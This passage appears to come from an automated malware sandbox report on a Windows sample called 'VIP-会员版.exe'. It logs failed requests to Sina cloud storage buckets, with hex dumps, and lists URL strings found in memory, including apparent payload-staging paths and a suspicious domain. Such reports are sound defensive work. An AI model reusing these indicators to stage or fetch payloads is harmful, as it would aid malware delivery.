32 31 2d 32 37 31 30 2d 35 63 61 37 32 31 33 65 30 32 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>769b7fff-2412-0521-2710-5ca7213e02f2</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:10 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32ee3085-2412-0521-2712-b4055d752c2cx-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 65 65 33 30 38 35 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 32 2d 62 34 30 35 35 64 37 35 32 63 32 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32ee3085-2412-0521-2712-b4055d752c2c</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:13 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 3566e00a-2412-0521-2715-6c92bfce68e1x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 36 36 65 30 30 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 35 2d 36 63 39 32 62 66 63 65 36 38 65 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>3566e00a-2412-0521-2715-6c92bfce68e1</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:09 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32da3749-2412-0521-2717-b4055d752cc6x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 64 61 33 37 34 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 37 2d 62 34 30 35 35 64 37 35 32 63 63 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32da3749-2412-0521-2717-b4055d752cc6</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:27:19 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 34f12e6c-2412-0521-2719-6c92bfce66dex-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 66 31 32 65 36 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 39 2d 36 63 39 32 62 66 63 65 36 36 64 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>34f12e6c-2412-0521-2719-6c92bfce66de</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:27:22 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 7470899e-2412-0521-2722-047bcb4b71b0x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 37 30 38 39 39 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 32 2d 30 34 37 62 63 62 34 62 37 31 62 30 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>7470899e-2412-0521-2722-047bcb4b71b0</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:27:24 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 74171eea-2412-0521-2724-0894eff93518x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 31 37 31 65 65 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 34 2d 30 38 39 34 65 66 66 39 33 35 31 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>74171eea-2412-0521-2724-0894eff93518</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:27:27 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 345d03c2-2412-0521-2727-0894eff93894x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 35 64 30 33 63 32 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 37 2d 30 38 39 34 65 66 66 39 33 38 39 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>345d03c2-2412-0521-2727-0894eff93894</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:21 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 74127bac-2412-0521-2730-0894eff93275x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 31 32 37 62 61 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 33 30 2d 30 38 39 34 65 66 66 39 33 32 37 35 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>74127bac-2412-0521-2730-0894eff93275</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:30 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32cd48c3-2412-0521-2732-b4055d7528f1x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 63 64 34 38 63 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 33 32 2d 62 34 30 35 35 64 37 35 32 38 66 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>32cd48c3-2412-0521-2732-b4055d7528f1</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:27:55 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32da782c-2412-0521-2757-b4055d752cc6x-error-code: NoSuchBucketData Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 64 61 37 38 32 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 35 37 2d 62 34 30 35 35 64 37 35 32 63 63 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>32da782c-2412-0521-2757-b4055d752cc6</RequestId></Error>0
      Source: D74384FB8D2C9.exe, 00000002.00000002.4587590988.000000000EB52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.1
      Source: D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/
      Source: D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/c
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=/-
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=cd
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=dq
      Source: D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=fd
      Source: D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net$3/
      Source: D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net&
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net88701
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.netC6753
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinacloud.net~p
      Source: D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn
      Source: D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn$
      Source: D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://114.114.114.114/d?dn=sinastorage.cn&
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/8871
      Source: D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D44000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/C:
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/D
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/EM
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/Z
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/d497ea
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/f
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/le.css
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000005FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/q
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/r
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/style.css
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/style.css)
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/style.cssR
      Source: D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/tyle.css1Yd
      Source: D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.com/y
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://shoufeifz.qijianfz.comhttp://fuzhu.eno147
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://sinacloud.net/question/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://sinacloud.net/question/http://sinastorage.cn/question/http://sinastorage.com/question/http://
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://sinastorage.cn/question/
      Source: VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://sinastorage.com/question/
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: http://th.symcb.com/th.crl0
      Source: D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800595709.0000000005655000.00000004.00000020.00020000.00000000.sdmp, 22FD558C8.sys.2.dr, D74384F.sys.2.drString found in binary or memory: http://th.symcb.com/th.crt0
